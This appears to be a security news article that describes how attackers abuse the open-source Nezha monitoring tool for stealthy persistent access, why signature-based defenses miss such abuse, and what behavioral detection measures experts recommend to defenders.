The modern threat landscape shows developments in attack tactics that change the scope of what attackers can do with various tools. Recent advances have demonstrated that threat actors no longer need custom malware to establish and maintain access to target systems. Many have turned to manipulating legitimate and open-source tools for malicious purposes. These tools have a strategic appeal due to requiring less overhead investment of skills and resources, enabling attackers to easily exploit the trust that users place in widely-used tools.
Nezha: A Monitoring Tool With a Dark Twin
Nezha is an open-source Chinese IT tool designed to help administrators monitor servers. It includes functionalities in resource tracking, alerting, and remote maintenance, with a central dashboard for management of multiple servers. It is widely popular due to its enabling of unified visibility across servers and remote access capabilities.
However, some of the most convenient functions of the tool can also be exploited by threat actors, as demonstrated by Nezha-based attacks discovered by Ontinue. Attackers can abuse root access, file control, and web terminal abilities to carry out malicious activity. On devices compromised by this attack, VirusTotal shows 0/72 detections, highlighting the fact that these attacks leverage legitimate software rather than malware that can be detected by such tools.
Post-Exploitation Has a New Playbook
The Nezha abuse attacks handled by Ontinue SOC showed silent installation and delayed detection, with systems unable to detect the type of activity that makes up these attacks. In this case, a post-exploitation command execution was the first visible signal alerting the attack. The code was a bash script revealing the attacker’s C2 access, dashboard connection, and the use of a GitHub proxy server.
The deployment and lack of detection of the attacker’s presence demonstrate that post-exploitation tooling is evolving faster than prevention efforts can keep up with. The threat actor, abusing legitimate software rather than using detectable malware and establishing a persistent presence and control, could have been able to compromise potentially hundreds of endpoints connected to the central Nezha dashboard.
Living Off the Land, Revisited
The classic “living off the land” technique is evolving to no longer be just about PowerShell. Attackers can use other tools and methods to establish and maintain presence on target devices, with the rise of third-party and open-source tools serving as persistence mechanisms in modern attacks. Attacks are no longer signaled by binaries but are critically tied to user intent as legitimate tools are increasingly repurposed for malicious means.
The shift in attack tactics is a crucial factor in determining security strategies moving forward, requiring robust measures and tools to account for various vectors and forms of threats. “This is another example of why it is important for enterprises to have a strong ‘Defense in Depth’ approach to cybersecurity,” according to John Gallagher, Vice President of Viakoo Labs at Viakoo, a Mountain View, Calif.-based provider of automated IoT cyber hygiene. “Assuming that an open source agent might have vulnerabilities or unexposed zero days is a very good assumption.”
Why Traditional Security Controls Miss This
Traditional security measures fall short in the face of modern attacks, including those leveraging benign, open-source tools. These security tools often use signature-based detection rather than the behavioral context required for discerning regular activity from malicious usage of legitimate software.
A malware-centric way of approaching remote access attacks is limited in its inability to detect and prevent threats based on the abuse of legitimate tools. Security measures like EDR, SIEM, and SOC workflows struggle with this abuse as they are not designed to detect malicious behavior related to legitimate tools. Protecting against attacks like this demands sophisticated behavioral analysis that can distinguish between authentic use and malicious abuse of tools.
Rethinking Detection in a World of Trusted Abuse
As attacks like this grow more popular, it is crucial for defenders to adjust their approach to persistent access by focusing on anomalous behavior instead of detecting known bad files. Execution context, infrastructure mapping, and intent are vitally important pieces of the puzzle that security tools must be able to understand in order to protect against modern attacks. The recently-discovered Nezha abuse teaches us that future adversary tradecraft no longer has to depend upon malware for persistent remote access.
“In short, we must stop viewing tools as either malicious or benign, and instead focus on usage patterns and context,” says Mayuresh Dani, Security Research Manager at Qualys Threat Research Unit, recommending that organizations take several steps to protect against modern threats. The suggested measures include inventorying all RMM tools and RATs, configuring monitoring tools to perform behavioral detection with real-time alerts, and establishing appropriate restrictions on RMM tool usage to protect against abuse.
The Bigger Lesson for Defenders
Defenders must understand that trust is now conditional, resting on behavior and intent rather than binary detection. The existence and widespread use of open-source software is not the problem underlying these attacks, but their visibility is. Security teams must assume that attackers will continue using ostensibly benign tools for malicious purposes, as the abuse of legitimate software is appealing and profitable for threat actors.
